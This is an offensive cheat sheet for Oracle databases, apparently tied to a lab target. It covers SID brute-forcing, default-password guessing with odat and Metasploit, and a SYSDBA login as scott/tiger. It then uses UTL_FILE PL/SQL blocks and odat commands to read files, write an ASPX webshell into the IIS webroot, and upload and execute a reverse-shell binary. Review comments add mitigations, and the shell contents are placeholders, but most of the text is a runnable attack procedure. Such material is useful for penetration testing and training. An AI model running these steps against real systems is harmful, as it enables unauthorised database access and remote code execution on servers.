# Convert the downloaded RPM packages (presumably the Oracle client, given the
# ORACLE_HOME path below) to .deb packages and install them.
# NOTE(review): both globs act on every matching file in the current directory.
# Run this in a directory that holds only packages obtained from a trusted
# source, since dpkg installs them as root.
sudo alien --to-deb *.rpm
sudo dpkg -i *.deb
# Add the exports below to /etc/profile so ORACLE_HOME is set for login shells.
# /usr/lib/oracle holds 2 directories. Use the 19.x one. To list them:
#ls /usr/lib/oracle
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
# ORACLE_HOME ends in "/", so ${ORACLE_HOME}bin expands to .../client64/bin.
export PATH=${ORACLE_HOME}bin:$PATH
# Python dependencies (presumably for odat.py, which this page runs later).
pip install cx_Oracle
# NOTE(review): pycryptodome is pinned to 3.4.3, well behind current releases.
# Confirm the pin is still required and install into an isolated virtualenv
# rather than the system Python so the old crypto library is not shared.
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap
Enumeration
#Enumerate SID [Oracle System ID for DB / String used to uniquely identify a particular database on a system.]
python3 odat.py sidguesser -s <IP> -p 1521
use auxiliary/scanner/oracle/sid_brute
#Check whether the TNS listener is susceptible to TNS poisoning
use auxiliary/scanner/oracle/tnspoison_checker
#Identify valid accounts with ODAT
#Wordlist: /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt ./accounts/accounts.txt
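#Change the formatting to match <user/pass>. The substitution below is written in vim ex syntax (sed uses the same s/.../.../g form) and replaces each space with a slash: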
%s/ /\//g
python3 odat.py passwordguesser -s <IP> -d <SID>
##Connect to DB with valid credentials
sqlplus64 scott/tiger@10.10.10.82/<SID> as sysdba
#List session privileges
select * from session_privs;
#List role privileges
select * from user_role_privs;
Exploitation
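Requires valid credentials. The examples below use the default scott/tiger account connected as SYSDBA, so changing or locking default accounts and not granting SYSDBA to them removes this precondition.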
Check Read Access
When running the PL/SQL blocks below inside the SQL*Plus session, type / on a line by itself to execute the block.
sqlplus64 scott/tiger@10.10.10.82/XE as sysdba
set serveroutput ON
#Run the anonymous PL/SQL block below (it is not stored in the database). Hit `/` to execute.
-- Anonymous PL/SQL block: reads the first line of iisstart.htm from
-- /inetpub/wwwroot through UTL_FILE and prints it with DBMS_OUTPUT.
-- If this succeeds, the connected account can reach the web server's content
-- directory from inside the database. Mitigation: restrict EXECUTE on UTL_FILE,
-- keep the directories it may open away from web content, and audit its use.
declare
-- f is the UTL_FILE handle, s is the varchar(200) buffer for one line.
f utl_file.file_type;
s varchar(200);
begin
-- Open read-only ('R'). fopen raises if the location or file is not accessible.
f :=utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm','R');
utl_file.get_line(f,s);
-- NOTE(review): no exception section, so f stays open if get_line raises.
utl_file.fclose(f);
-- The line is only displayed when SERVEROUTPUT is ON in the session.
dbms_output.put_line(s);
end;
Webshell
Web shell runs with IIS service privileges.
Upload webshell to webroot and access via web server.
#Automate using odat
#Set up an ASPX reverse shell & listener
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" <name-on-target>.aspx <path-to-shell-local> --sysdba
-----------
#Manual upload webshell. Remove extra lines/comments. Line count needs to be <1000 for Oracle to execute
cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx
sed -z 's/\n//g' shell.aspx
#Save the anonymous PL/SQL block below.
-- Anonymous PL/SQL block: writes the string in s as one line to cmd.aspx under
-- /inetpub/wwwroot via UTL_FILE (mode 'W' creates or overwrites the file).
-- Defensive view: a database session able to create script files in the web
-- root is itself the finding. Watch for new .aspx files appearing there that
-- were written by the database service, audit execution of UTL_FILE, and keep
-- database-writable directories separate from anything the web server serves.
declare
f utl_file.file_type;
-- Placeholder only. The page leaves the content to the reader.
s varchar(5000) := '<Replace with .aspx webshell code>';
begin
f :=utl_file.fopen('/inetpub/wwwroot', 'cmd.aspx','W');
utl_file.put_line(f,s);
-- NOTE(review): no exception section, so f stays open if put_line raises.
utl_file.fclose(f);
end;
Reverse Shell
May be unstable
Runs with Oracle service privileges
#Set up reverse shell and listener
python odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /<Target-location> <uploadedshell.exe> <path-to-shell-local --sysdba
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec </temp: Target-location> <uploadedshell.exe>
----------------------------
#Manual upload
-- Anonymous PL/SQL block: writes the string in s as one line to revshell.exe
-- under /inetpub/wwwroot via UTL_FILE (mode 'W' creates or overwrites the file).
-- Defensive view: executables appearing in a web content directory, created by
-- the database service account, are a strong indicator of compromise. Alert on
-- such file creation, audit execution of UTL_FILE, and use application
-- allow-listing so files dropped this way cannot be run.
declare
f utl_file.file_type;
-- Placeholder only. The page leaves the content to the reader.
s varchar(5000) := '<Replace with shellcode>';
begin
f :=utl_file.fopen('/inetpub/wwwroot', 'revshell.exe','W');
utl_file.put_line(f,s);
-- NOTE(review): no exception section, so f stays open if put_line raises.
utl_file.fclose(f);
end;